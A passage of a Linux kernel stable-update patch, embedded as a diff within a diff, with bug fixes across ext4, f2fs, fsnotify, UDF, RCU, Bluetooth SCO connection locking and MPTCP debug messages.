+ 	if (EXT4_EXT_MAY_ZEROOUT & split_flag) {
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 93a1c22048de6..7aa0a88733982 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -5101,9 +5101,12 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 				 "iget: bogus i_mode (%o)", inode->i_mode);
+ 		goto bad_inode;
+ 	}
+-	if (IS_CASEFOLDED(inode) && !ext4_has_feature_casefold(inode->i_sb))
++	if (IS_CASEFOLDED(inode) && !ext4_has_feature_casefold(inode->i_sb)) {
+ 		ext4_error_inode(inode, function, line, 0,
+ 				 "casefold flag without casefold feature");
++		ret = -EFSCORRUPTED;
++		goto bad_inode;
++	}
+ 	if ((err_str = check_igot_inode(inode, flags)) != NULL) {
+ 		ext4_error_inode(inode, function, line, 0, err_str);
+ 		ret = -EFSCORRUPTED;
+diff --git a/fs/ext4/page-io.c b/fs/ext4/page-io.c
+index d0302b66c215d..d9d9650a7281d 100644
+--- a/fs/ext4/page-io.c
++++ b/fs/ext4/page-io.c
+@@ -484,6 +484,13 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 			/* A hole? We can safely clear the dirty bit */
+ 			if (!buffer_mapped(bh))
+ 				clear_buffer_dirty(bh);
++			/*
++			 * Keeping dirty some buffer we cannot write? Make
++			 * sure to redirty the page. This happens e.g. when
++			 * doing writeout for transaction commit.
++			 */
++			if (buffer_dirty(bh) && !PageDirty(page))
++				redirty_page_for_writepage(wbc, page);
+ 			if (io->io_bio)
+ 				ext4_io_submit(io);
+ 			continue;
+@@ -491,6 +498,7 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 		if (buffer_new(bh))
+ 			clear_buffer_new(bh);
+ 		set_buffer_async_write(bh);
++		clear_buffer_dirty(bh);
+ 		nr_to_submit++;
+ 	} while ((bh = bh->b_this_page) != head);
+ 
+@@ -534,7 +542,10 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 			printk_ratelimited(KERN_ERR "%s: ret = %d\n", __func__, ret);
+ 			redirty_page_for_writepage(wbc, page);
+ 			do {
+-				clear_buffer_async_write(bh);
++				if (buffer_async_write(bh)) {
++					clear_buffer_async_write(bh);
++					set_buffer_dirty(bh);
++				}
+ 				bh = bh->b_this_page;
+ 			} while (bh != head);
+ 			goto unlock;
+@@ -547,7 +558,6 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 			continue;
+ 		io_submit_add_bh(io, inode, page, bounce_page, bh);
+ 		nr_submitted++;
+-		clear_buffer_dirty(bh);
+ 	} while ((bh = bh->b_this_page) != head);
+ 
+ unlock:
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index a02c748753161..2b540d87859e0 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -788,6 +788,7 @@ enum {
+ 	FI_ALIGNED_WRITE,	/* enable aligned write */
+ 	FI_COW_FILE,		/* indicate COW file */
+ 	FI_ATOMIC_COMMITTED,	/* indicate atomic commit completed except disk sync */
++	FI_OPENED_FILE,         /* indicate file has been opened */
+ 	FI_MAX,			/* max flag, never be used */
+ };
+ 
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index c6fb179f9d4af..62f2521cd955e 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -538,6 +538,42 @@ static int f2fs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 	return 0;
+ }
+ 
++static int finish_preallocate_blocks(struct inode *inode)
++{
++	int ret;
++
++	inode_lock(inode);
++	if (is_inode_flag_set(inode, FI_OPENED_FILE)) {
++		inode_unlock(inode);
++		return 0;
++	}
++
++	if (!file_should_truncate(inode)) {
++		set_inode_flag(inode, FI_OPENED_FILE);
++		inode_unlock(inode);
++		return 0;
++	}
++
++	f2fs_down_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
++	filemap_invalidate_lock(inode->i_mapping);
++
++	truncate_setsize(inode, i_size_read(inode));
++	ret = f2fs_truncate(inode);
++
++	filemap_invalidate_unlock(inode->i_mapping);
++	f2fs_up_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
++
++	if (!ret)
++		set_inode_flag(inode, FI_OPENED_FILE);
++
++	inode_unlock(inode);
++	if (ret)
++		return ret;
++
++	file_dont_truncate(inode);
++	return 0;
++}
++
+ static int f2fs_file_open(struct inode *inode, struct file *filp)
+ {
+ 	int err = fscrypt_file_open(inode, filp);
+@@ -554,7 +590,11 @@ static int f2fs_file_open(struct inode *inode, struct file *filp)
+ 
+ 	filp->f_mode |= FMODE_NOWAIT;
+ 
+-	return dquot_file_open(inode, filp);
++	err = dquot_file_open(inode, filp);
++	if (err)
++		return err;
++
++	return finish_preallocate_blocks(inode);
+ }
+ 
+ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index ff4a4e92a40c7..5b672df194a99 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -549,14 +549,6 @@ struct inode *f2fs_iget(struct super_block *sb, unsigned long ino)
+ 	}
+ 	f2fs_set_inode_flags(inode);
+ 
+-	if (file_should_truncate(inode) &&
+-			!is_sbi_flag_set(sbi, SBI_POR_DOING)) {
+-		ret = f2fs_truncate(inode);
+-		if (ret)
+-			goto bad_inode;
+-		file_dont_truncate(inode);
+-	}
+-
+ 	unlock_new_inode(inode);
+ 	trace_f2fs_iget(inode);
+ 	return inode;
+diff --git a/fs/notify/fsnotify.c b/fs/notify/fsnotify.c
+index 7974e91ffe134..b5d8f238fce42 100644
+--- a/fs/notify/fsnotify.c
++++ b/fs/notify/fsnotify.c
+@@ -103,17 +103,13 @@ void fsnotify_sb_delete(struct super_block *sb)
+  * parent cares.  Thus when an event happens on a child it can quickly tell
+  * if there is a need to find a parent and send the event to the parent.
+  */
+-void __fsnotify_update_child_dentry_flags(struct inode *inode)
++void fsnotify_set_children_dentry_flags(struct inode *inode)
+ {
+ 	struct dentry *alias;
+-	int watched;
+ 
+ 	if (!S_ISDIR(inode->i_mode))
+ 		return;
+ 
+-	/* determine if the children should tell inode about their events */
+-	watched = fsnotify_inode_watches_children(inode);
+-
+ 	spin_lock(&inode->i_lock);
+ 	/* run all of the dentries associated with this inode.  Since this is a
+ 	 * directory, there damn well better only be one item on this list */
+@@ -129,10 +125,7 @@ void __fsnotify_update_child_dentry_flags(struct inode *inode)
+ 				continue;
+ 
+ 			spin_lock_nested(&child->d_lock, DENTRY_D_LOCK_NESTED);
+-			if (watched)
+-				child->d_flags |= DCACHE_FSNOTIFY_PARENT_WATCHED;
+-			else
+-				child->d_flags &= ~DCACHE_FSNOTIFY_PARENT_WATCHED;
++			child->d_flags |= DCACHE_FSNOTIFY_PARENT_WATCHED;
+ 			spin_unlock(&child->d_lock);
+ 		}
+ 		spin_unlock(&alias->d_lock);
+@@ -140,6 +133,24 @@ void __fsnotify_update_child_dentry_flags(struct inode *inode)
+ 	spin_unlock(&inode->i_lock);
+ }
+ 
++/*
++ * Lazily clear false positive PARENT_WATCHED flag for child whose parent had
++ * stopped watching children.
++ */
++static void fsnotify_clear_child_dentry_flag(struct inode *pinode,
++					     struct dentry *dentry)
++{
++	spin_lock(&dentry->d_lock);
++	/*
++	 * d_lock is a sufficient barrier to prevent observing a non-watched
++	 * parent state from before the fsnotify_set_children_dentry_flags()
++	 * or fsnotify_update_flags() call that had set PARENT_WATCHED.
++	 */
++	if (!fsnotify_inode_watches_children(pinode))
++		dentry->d_flags &= ~DCACHE_FSNOTIFY_PARENT_WATCHED;
++	spin_unlock(&dentry->d_lock);
++}
++
+ /* Are inode/sb/mount interested in parent and name info with this event? */
+ static bool fsnotify_event_needs_parent(struct inode *inode, struct mount *mnt,
+ 					__u32 mask)
+@@ -208,7 +219,7 @@ int __fsnotify_parent(struct dentry *dentry, __u32 mask, const void *data,
+ 	p_inode = parent->d_inode;
+ 	p_mask = fsnotify_inode_watches_children(p_inode);
+ 	if (unlikely(parent_watched && !p_mask))
+-		__fsnotify_update_child_dentry_flags(p_inode);
++		fsnotify_clear_child_dentry_flag(p_inode, dentry);
+ 
+ 	/*
+ 	 * Include parent/name in notification either if some notification
+diff --git a/fs/notify/fsnotify.h b/fs/notify/fsnotify.h
+index fde74eb333cc9..2b4267de86e6b 100644
+--- a/fs/notify/fsnotify.h
++++ b/fs/notify/fsnotify.h
+@@ -74,7 +74,7 @@ static inline void fsnotify_clear_marks_by_sb(struct super_block *sb)
+  * update the dentry->d_flags of all of inode's children to indicate if inode cares
+  * about events that happen to its children.
+  */
+-extern void __fsnotify_update_child_dentry_flags(struct inode *inode);
++extern void fsnotify_set_children_dentry_flags(struct inode *inode);
+ 
+ extern struct kmem_cache *fsnotify_mark_connector_cachep;
+ 
+diff --git a/fs/notify/mark.c b/fs/notify/mark.c
+index c74ef947447d6..4be6e883d492f 100644
+--- a/fs/notify/mark.c
++++ b/fs/notify/mark.c
+@@ -176,6 +176,24 @@ static void *__fsnotify_recalc_mask(struct fsnotify_mark_connector *conn)
+ 	return fsnotify_update_iref(conn, want_iref);
+ }
+ 
++static bool fsnotify_conn_watches_children(
++					struct fsnotify_mark_connector *conn)
++{
++	if (conn->type != FSNOTIFY_OBJ_TYPE_INODE)
++		return false;
++
++	return fsnotify_inode_watches_children(fsnotify_conn_inode(conn));
++}
++
++static void fsnotify_conn_set_children_dentry_flags(
++					struct fsnotify_mark_connector *conn)
++{
++	if (conn->type != FSNOTIFY_OBJ_TYPE_INODE)
++		return;
++
++	fsnotify_set_children_dentry_flags(fsnotify_conn_inode(conn));
++}
++
+ /*
+  * Calculate mask of events for a list of marks. The caller must make sure
+  * connector and connector->obj cannot disappear under us.  Callers achieve
+@@ -184,15 +202,23 @@ static void *__fsnotify_recalc_mask(struct fsnotify_mark_connector *conn)
+  */
+ void fsnotify_recalc_mask(struct fsnotify_mark_connector *conn)
+ {
++	bool update_children;
++
+ 	if (!conn)
+ 		return;
+ 
+ 	spin_lock(&conn->lock);
++	update_children = !fsnotify_conn_watches_children(conn);
+ 	__fsnotify_recalc_mask(conn);
++	update_children &= fsnotify_conn_watches_children(conn);
+ 	spin_unlock(&conn->lock);
+-	if (conn->type == FSNOTIFY_OBJ_TYPE_INODE)
+-		__fsnotify_update_child_dentry_flags(
+-					fsnotify_conn_inode(conn));
++	/*
++	 * Set children's PARENT_WATCHED flags only if parent started watching.
++	 * When parent stops watching, we clear false positive PARENT_WATCHED
++	 * flags lazily in __fsnotify_parent().
++	 */
++	if (update_children)
++		fsnotify_conn_set_children_dentry_flags(conn);
+ }
+ 
+ /* Free all connectors queued for freeing once SRCU period ends */
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 65fbc60a88e44..3b6419f29a4c7 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -86,6 +86,13 @@ enum {
+ #define UDF_MAX_LVID_NESTING 1000
+ 
+ enum { UDF_MAX_LINKS = 0xffff };
++/*
++ * We limit filesize to 4TB. This is arbitrary as the on-disk format supports
++ * more but because the file space is described by a linked list of extents,
++ * each of which can have at most 1GB, the creation and handling of extents
++ * gets unusably slow beyond certain point...
++ */
++#define UDF_MAX_FILESIZE (1ULL << 42)
+ 
+ /* These are the "meat" - everything else is stuffing */
+ static int udf_fill_super(struct super_block *, void *, int);
+@@ -2299,7 +2306,7 @@ static int udf_fill_super(struct super_block *sb, void *options, int silent)
+ 		ret = -ENOMEM;
+ 		goto error_out;
+ 	}
+-	sb->s_maxbytes = MAX_LFS_FILESIZE;
++	sb->s_maxbytes = UDF_MAX_FILESIZE;
+ 	sb->s_max_links = UDF_MAX_LINKS;
+ 	return 0;
+ 
+diff --git a/include/clocksource/timer-xilinx.h b/include/clocksource/timer-xilinx.h
+index c0f56fe6d22ae..d116f18de899c 100644
+--- a/include/clocksource/timer-xilinx.h
++++ b/include/clocksource/timer-xilinx.h
+@@ -41,7 +41,7 @@ struct regmap;
+ struct xilinx_timer_priv {
+ 	struct regmap *map;
+ 	struct clk *clk;
+-	u32 max;
++	u64 max;
+ };
+ 
+ /**
+diff --git a/include/linux/fsnotify_backend.h b/include/linux/fsnotify_backend.h
+index d7d96c806bff2..096b79e4373f4 100644
+--- a/include/linux/fsnotify_backend.h
++++ b/include/linux/fsnotify_backend.h
+@@ -563,12 +563,14 @@ static inline __u32 fsnotify_parent_needed_mask(__u32 mask)
+ 
+ static inline int fsnotify_inode_watches_children(struct inode *inode)
+ {
++	__u32 parent_mask = READ_ONCE(inode->i_fsnotify_mask);
++
+ 	/* FS_EVENT_ON_CHILD is set if the inode may care */
+-	if (!(inode->i_fsnotify_mask & FS_EVENT_ON_CHILD))
++	if (!(parent_mask & FS_EVENT_ON_CHILD))
+ 		return 0;
+ 	/* this inode might care about child events, does it care about the
+ 	 * specific set of events that can happen on a child? */
+-	return inode->i_fsnotify_mask & FS_EVENTS_POSS_ON_CHILD;
++	return parent_mask & FS_EVENTS_POSS_ON_CHILD;
+ }
+ 
+ /*
+@@ -582,7 +584,7 @@ static inline void fsnotify_update_flags(struct dentry *dentry)
+ 	/*
+ 	 * Serialisation of setting PARENT_WATCHED on the dentries is provided
+ 	 * by d_lock. If inotify_inode_watched changes after we have taken
+-	 * d_lock, the following __fsnotify_update_child_dentry_flags call will
++	 * d_lock, the following fsnotify_set_children_dentry_flags call will
+ 	 * find our entry, so it will spin until we complete here, and update
+ 	 * us with the new state.
+ 	 */
+diff --git a/include/linux/hwspinlock.h b/include/linux/hwspinlock.h
+index bfe7c1f1ac6d1..f0231dbc47771 100644
+--- a/include/linux/hwspinlock.h
++++ b/include/linux/hwspinlock.h
+@@ -68,6 +68,7 @@ int __hwspin_lock_timeout(struct hwspinlock *, unsigned int, int,
+ int __hwspin_trylock(struct hwspinlock *, int, unsigned long *);
+ void __hwspin_unlock(struct hwspinlock *, int, unsigned long *);
+ int of_hwspin_lock_get_id_byname(struct device_node *np, const char *name);
++int hwspin_lock_bust(struct hwspinlock *hwlock, unsigned int id);
+ int devm_hwspin_lock_free(struct device *dev, struct hwspinlock *hwlock);
+ struct hwspinlock *devm_hwspin_lock_request(struct device *dev);
+ struct hwspinlock *devm_hwspin_lock_request_specific(struct device *dev,
+@@ -127,6 +128,11 @@ void __hwspin_unlock(struct hwspinlock *hwlock, int mode, unsigned long *flags)
+ {
+ }
+ 
++static inline int hwspin_lock_bust(struct hwspinlock *hwlock, unsigned int id)
++{
++	return 0;
++}
++
+ static inline int of_hwspin_lock_get_id(struct device_node *np, int index)
+ {
+ 	return 0;
+diff --git a/include/linux/i2c.h b/include/linux/i2c.h
+index cfc59c3371cb2..35e296d9e1c55 100644
+--- a/include/linux/i2c.h
++++ b/include/linux/i2c.h
+@@ -1035,7 +1035,7 @@ static inline int of_i2c_get_board_info(struct device *dev,
+ struct acpi_resource;
+ struct acpi_resource_i2c_serialbus;
+ 
+-#if IS_ENABLED(CONFIG_ACPI)
++#if IS_REACHABLE(CONFIG_ACPI) && IS_REACHABLE(CONFIG_I2C)
+ bool i2c_acpi_get_i2c_resource(struct acpi_resource *ares,
+ 			       struct acpi_resource_i2c_serialbus **i2c);
+ int i2c_acpi_client_count(struct acpi_device *adev);
+diff --git a/kernel/dma/debug.c b/kernel/dma/debug.c
+index 3ff7089d11a92..de02c0808fb83 100644
+--- a/kernel/dma/debug.c
++++ b/kernel/dma/debug.c
+@@ -445,8 +445,11 @@ void debug_dma_dump_mappings(struct device *dev)
+  * dma_active_cacheline entry to track per event.  dma_map_sg(), on the
+  * other hand, consumes a single dma_debug_entry, but inserts 'nents'
+  * entries into the tree.
++ *
++ * Use __GFP_NOWARN because the printk from an OOM, to netconsole, could end
++ * up right back in the DMA debugging code, leading to a deadlock.
+  */
+-static RADIX_TREE(dma_active_cacheline, GFP_ATOMIC);
++static RADIX_TREE(dma_active_cacheline, GFP_ATOMIC | __GFP_NOWARN);
+ static DEFINE_SPINLOCK(radix_lock);
+ #define ACTIVE_CACHELINE_MAX_OVERLAP ((1 << RADIX_TREE_MAX_TAGS) - 1)
+ #define CACHELINE_PER_PAGE_SHIFT (PAGE_SHIFT - L1_CACHE_SHIFT)
+diff --git a/kernel/rcu/tree.h b/kernel/rcu/tree.h
+index 7b702220d81cb..aa16d3cd62ba5 100644
+--- a/kernel/rcu/tree.h
++++ b/kernel/rcu/tree.h
+@@ -207,7 +207,6 @@ struct rcu_data {
+ 	struct swait_queue_head nocb_state_wq; /* For offloading state changes */
+ 	struct task_struct *nocb_gp_kthread;
+ 	raw_spinlock_t nocb_lock;	/* Guard following pair of fields. */
+-	atomic_t nocb_lock_contended;	/* Contention experienced. */
+ 	int nocb_defer_wakeup;		/* Defer wakeup of nocb_kthread. */
+ 	struct timer_list nocb_timer;	/* Enforce finite deferral. */
+ 	unsigned long nocb_gp_adv_time;	/* Last call_rcu() CB adv (jiffies). */
+diff --git a/kernel/rcu/tree_nocb.h b/kernel/rcu/tree_nocb.h
+index 0a5f0ef414845..6499eefa06603 100644
+--- a/kernel/rcu/tree_nocb.h
++++ b/kernel/rcu/tree_nocb.h
+@@ -91,8 +91,7 @@ module_param(nocb_nobypass_lim_per_jiffy, int, 0);
+ 
+ /*
+  * Acquire the specified rcu_data structure's ->nocb_bypass_lock.  If the
+- * lock isn't immediately available, increment ->nocb_lock_contended to
+- * flag the contention.
++ * lock isn't immediately available, perform minimal sanity check.
+  */
+ static void rcu_nocb_bypass_lock(struct rcu_data *rdp)
+ 	__acquires(&rdp->nocb_bypass_lock)
+@@ -100,29 +99,12 @@ static void rcu_nocb_bypass_lock(struct rcu_data *rdp)
+ 	lockdep_assert_irqs_disabled();
+ 	if (raw_spin_trylock(&rdp->nocb_bypass_lock))
+ 		return;
+-	atomic_inc(&rdp->nocb_lock_contended);
++	/*
++	 * Contention expected only when local enqueue collide with
++	 * remote flush from kthreads.
++	 */
+ 	WARN_ON_ONCE(smp_processor_id() != rdp->cpu);
+-	smp_mb__after_atomic(); /* atomic_inc() before lock. */
+ 	raw_spin_lock(&rdp->nocb_bypass_lock);
+-	smp_mb__before_atomic(); /* atomic_dec() after lock. */
+-	atomic_dec(&rdp->nocb_lock_contended);
+-}
+-
+-/*
+- * Spinwait until the specified rcu_data structure's ->nocb_lock is
+- * not contended.  Please note that this is extremely special-purpose,
+- * relying on the fact that at most two kthreads and one CPU contend for
+- * this lock, and also that the two kthreads are guaranteed to have frequent
+- * grace-period-duration time intervals between successive acquisitions
+- * of the lock.  This allows us to use an extremely simple throttling
+- * mechanism, and further to apply it only to the CPU doing floods of
+- * call_rcu() invocations.  Don't try this at home!
+- */
+-static void rcu_nocb_wait_contended(struct rcu_data *rdp)
+-{
+-	WARN_ON_ONCE(smp_processor_id() != rdp->cpu);
+-	while (WARN_ON_ONCE(atomic_read(&rdp->nocb_lock_contended)))
+-		cpu_relax();
+ }
+ 
+ /*
+@@ -452,7 +434,6 @@ static bool rcu_nocb_try_bypass(struct rcu_data *rdp, struct rcu_head *rhp,
+ 	}
+ 
+ 	// We need to use the bypass.
+-	rcu_nocb_wait_contended(rdp);
+ 	rcu_nocb_bypass_lock(rdp);
+ 	ncbs = rcu_cblist_n_cbs(&rdp->nocb_bypass);
+ 	rcu_segcblist_inc_len(&rdp->cblist); /* Must precede enqueue. */
+@@ -1476,12 +1457,11 @@ static void show_rcu_nocb_state(struct rcu_data *rdp)
+ 
+ 	sprintf(bufw, "%ld", rsclp->gp_seq[RCU_WAIT_TAIL]);
+ 	sprintf(bufr, "%ld", rsclp->gp_seq[RCU_NEXT_READY_TAIL]);
+-	pr_info("   CB %d^%d->%d %c%c%c%c%c%c F%ld L%ld C%d %c%c%s%c%s%c%c q%ld %c CPU %d%s\n",
++	pr_info("   CB %d^%d->%d %c%c%c%c%c F%ld L%ld C%d %c%c%s%c%s%c%c q%ld %c CPU %d%s\n",
+ 		rdp->cpu, rdp->nocb_gp_rdp->cpu,
+ 		nocb_next_rdp ? nocb_next_rdp->cpu : -1,
+ 		"kK"[!!rdp->nocb_cb_kthread],
+ 		"bB"[raw_spin_is_locked(&rdp->nocb_bypass_lock)],
+-		"cC"[!!atomic_read(&rdp->nocb_lock_contended)],
+ 		"lL"[raw_spin_is_locked(&rdp->nocb_lock)],
+ 		"sS"[!!rdp->nocb_cb_sleep],
+ 		".W"[swait_active(&rdp->nocb_cb_wq)],
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index a3bbe04b11383..92ea01f9def3e 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -130,8 +130,11 @@ static struct sco_conn *sco_conn_add(struct hci_conn *hcon)
+ 	struct hci_dev *hdev = hcon->hdev;
+ 	struct sco_conn *conn = hcon->sco_data;
+ 
+-	if (conn)
++	if (conn) {
++		if (!conn->hcon)
++			conn->hcon = hcon;
+ 		return conn;
++	}
+ 
+ 	conn = kzalloc(sizeof(struct sco_conn), GFP_KERNEL);
+ 	if (!conn)
+@@ -239,40 +242,56 @@ static int sco_chan_add(struct sco_conn *conn, struct sock *sk,
+ 	return err;
+ }
+ 
+-static int sco_connect(struct hci_dev *hdev, struct sock *sk)
++static int sco_connect(struct sock *sk)
+ {
+ 	struct sco_conn *conn;
+ 	struct hci_conn *hcon;
++	struct hci_dev  *hdev;
+ 	int err, type;
+ 
+ 	BT_DBG("%pMR -> %pMR", &sco_pi(sk)->src, &sco_pi(sk)->dst);
+ 
++	hdev = hci_get_route(&sco_pi(sk)->dst, &sco_pi(sk)->src, BDADDR_BREDR);
++	if (!hdev)
++		return -EHOSTUNREACH;
++
++	hci_dev_lock(hdev);
++
+ 	if (lmp_esco_capable(hdev) && !disable_esco)
+ 		type = ESCO_LINK;
+ 	else
+ 		type = SCO_LINK;
+ 
+ 	if (sco_pi(sk)->setting == BT_VOICE_TRANSPARENT &&
+-	    (!lmp_transp_capable(hdev) || !lmp_esco_capable(hdev)))
+-		return -EOPNOTSUPP;
++	    (!lmp_transp_capable(hdev) || !lmp_esco_capable(hdev))) {
++		err = -EOPNOTSUPP;
++		goto unlock;
++	}
+ 
+ 	hcon = hci_connect_sco(hdev, type, &sco_pi(sk)->dst,
+ 			       sco_pi(sk)->setting, &sco_pi(sk)->codec);
+-	if (IS_ERR(hcon))
+-		return PTR_ERR(hcon);
++	if (IS_ERR(hcon)) {
++		err = PTR_ERR(hcon);
++		goto unlock;
++	}
+ 
+ 	conn = sco_conn_add(hcon);
+ 	if (!conn) {
+ 		hci_conn_drop(hcon);
+-		return -ENOMEM;
++		err = -ENOMEM;
++		goto unlock;
+ 	}
+ 
+-	/* Update source addr of the socket */
+-	bacpy(&sco_pi(sk)->src, &hcon->src);
++	lock_sock(sk);
+ 
+ 	err = sco_chan_add(conn, sk, NULL);
+-	if (err)
+-		return err;
++	if (err) {
++		release_sock(sk);
++		goto unlock;
++	}
++
++	/* Update source addr of the socket */
++	bacpy(&sco_pi(sk)->src, &hcon->src);
+ 
+ 	if (hcon->state == BT_CONNECTED) {
+ 		sco_sock_clear_timer(sk);
+@@ -282,6 +301,11 @@ static int sco_connect(struct hci_dev *hdev, struct sock *sk)
+ 		sco_sock_set_timer(sk, sk->sk_sndtimeo);
+ 	}
+ 
++	release_sock(sk);
++
++unlock:
++	hci_dev_unlock(hdev);
++	hci_dev_put(hdev);
+ 	return err;
+ }
+ 
+@@ -561,7 +585,6 @@ static int sco_sock_connect(struct socket *sock, struct sockaddr *addr, int alen
+ {
+ 	struct sockaddr_sco *sa = (struct sockaddr_sco *) addr;
+ 	struct sock *sk = sock->sk;
+-	struct hci_dev  *hdev;
+ 	int err;
+ 
+ 	BT_DBG("sk %p", sk);
+@@ -570,37 +593,26 @@ static int sco_sock_connect(struct socket *sock, struct sockaddr *addr, int alen
+ 	    addr->sa_family != AF_BLUETOOTH)
+ 		return -EINVAL;
+ 
+-	lock_sock(sk);
+-	if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+-		err = -EBADFD;
+-		goto done;
+-	}
++	if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND)
++		return -EBADFD;
+ 
+-	if (sk->sk_type != SOCK_SEQPACKET) {
++	if (sk->sk_type != SOCK_SEQPACKET)
+ 		err = -EINVAL;
+-		goto done;
+-	}
+-
+-	hdev = hci_get_route(&sa->sco_bdaddr, &sco_pi(sk)->src, BDADDR_BREDR);
+-	if (!hdev) {
+-		err = -EHOSTUNREACH;
+-		goto done;
+-	}
+-	hci_dev_lock(hdev);
+ 
++	lock_sock(sk);
+ 	/* Set destination address and psm */
+ 	bacpy(&sco_pi(sk)->dst, &sa->sco_bdaddr);
++	release_sock(sk);
+ 
+-	err = sco_connect(hdev, sk);
+-	hci_dev_unlock(hdev);
+-	hci_dev_put(hdev);
++	err = sco_connect(sk);
+ 	if (err)
+-		goto done;
++		return err;
++
++	lock_sock(sk);
+ 
+ 	err = bt_sock_wait_state(sk, BT_CONNECTED,
+ 				 sock_sndtimeo(sk, flags & O_NONBLOCK));
+ 
+-done:
+ 	release_sock(sk);
+ 	return err;
+ }
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index d469ad6c6a0ba..517bbfe5f626e 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -112,7 +112,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			mp_opt->suboptions |= OPTION_MPTCP_CSUMREQD;
+ 			ptr += 2;
+ 		}
+-		pr_debug("MP_CAPABLE version=%x, flags=%x, optlen=%d sndr=%llu, rcvr=%llu len=%d csum=%u",
++		pr_debug("MP_CAPABLE version=%x, flags=%x, optlen=%d sndr=%llu, rcvr=%llu len=%d csum=%u\n",
+ 			 version, flags, opsize, mp_opt->sndr_key,
+ 			 mp_opt->rcvr_key, mp_opt->data_len, mp_opt->csum);
+ 		break;
+@@ -126,7 +126,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			ptr += 4;
+ 			mp_opt->nonce = get_unaligned_be32(ptr);
+ 			ptr += 4;
+-			pr_debug("MP_JOIN bkup=%u, id=%u, token=%u, nonce=%u",
++			pr_debug("MP_JOIN bkup=%u, id=%u, token=%u, nonce=%u\n",
+ 				 mp_opt->backup, mp_opt->join_id,
+ 				 mp_opt->token, mp_opt->nonce);
+ 		} else if (opsize == TCPOLEN_MPTCP_MPJ_SYNACK) {
+@@ -137,19 +137,19 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			ptr += 8;
+ 			mp_opt->nonce = get_unaligned_be32(ptr);
+ 			ptr += 4;
+-			pr_debug("MP_JOIN bkup=%u, id=%u, thmac=%llu, nonce=%u",
++			pr_debug("MP_JOIN bkup=%u, id=%u, thmac=%llu, nonce=%u\n",
+ 				 mp_opt->backup, mp_opt->join_id,
+ 				 mp_opt->thmac, mp_opt->nonce);
+ 		} else if (opsize == TCPOLEN_MPTCP_MPJ_ACK) {
+ 			mp_opt->suboptions |= OPTION_MPTCP_MPJ_ACK;
+ 			ptr += 2;
+ 			memcpy(mp_opt->hmac, ptr, MPTCPOPT_HMAC_LEN);
+-			pr_debug("MP_JOIN hmac");
++			pr_debug("MP_JOIN hmac\n");
+ 		}
+ 		break;
+ 
+ 	case MPTCPOPT_DSS:
+-		pr_debug("DSS");
++		pr_debug("DSS\n");
+ 		ptr++;
+ 
+ 		/* we must clear 'mpc_map' be able to detect MP_CAPABLE
+@@ -164,7 +164,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		mp_opt->ack64 = (flags & MPTCP_DSS_ACK64) != 0;
+ 		mp_opt->use_ack = (flags & MPTCP_DSS_HAS_ACK);
+ 
+-		pr_debug("data_fin=%d dsn64=%d use_map=%d ack64=%d use_ack=%d",
++		pr_debug("data_fin=%d dsn64=%d use_map=%d ack64=%d use_ack=%d\n",
+ 			 mp_opt->data_fin, mp_opt->dsn64,
+ 			 mp_opt->use_map, mp_opt->ack64,
+ 			 mp_opt->use_ack);
+@@ -202,7 +202,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 				ptr += 4;
+ 			}
+ 
+-			pr_debug("data_ack=%llu", mp_opt->data_ack);
++			pr_debug("data_ack=%llu\n", mp_opt->data_ack);
+ 		}
+ 
+ 		if (mp_opt->use_map) {
+@@ -226,7 +226,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 				ptr += 2;
+ 			}
+ 
+-			pr_debug("data_seq=%llu subflow_seq=%u data_len=%u csum=%d:%u",
++			pr_debug("data_seq=%llu subflow_seq=%u data_len=%u csum=%d:%u\n",
+ 				 mp_opt->data_seq, mp_opt->subflow_seq,
+ 				 mp_opt->data_len, !!(mp_opt->suboptions & OPTION_MPTCP_CSUMREQD),
+ 				 mp_opt->csum);
+@@ -288,7 +288,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			mp_opt->ahmac = get_unaligned_be64(ptr);
+ 			ptr += 8;
+ 		}
+-		pr_debug("ADD_ADDR%s: id=%d, ahmac=%llu, echo=%d, port=%d",
++		pr_debug("ADD_ADDR%s: id=%d, ahmac=%llu, echo=%d, port=%d\n",
+ 			 (mp_opt->addr.family == AF_INET6) ? "6" : "",
+ 			 mp_opt->addr.id, mp_opt->ahmac, mp_opt->echo, ntohs(mp_opt->addr.port));
+ 		break;
+@@ -304,7 +304,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		mp_opt->rm_list.nr = opsize - TCPOLEN_MPTCP_RM_ADDR_BASE;
+ 		for (i = 0; i < mp_opt->rm_list.nr; i++)
+ 			mp_opt->rm_list.ids[i] = *ptr++;
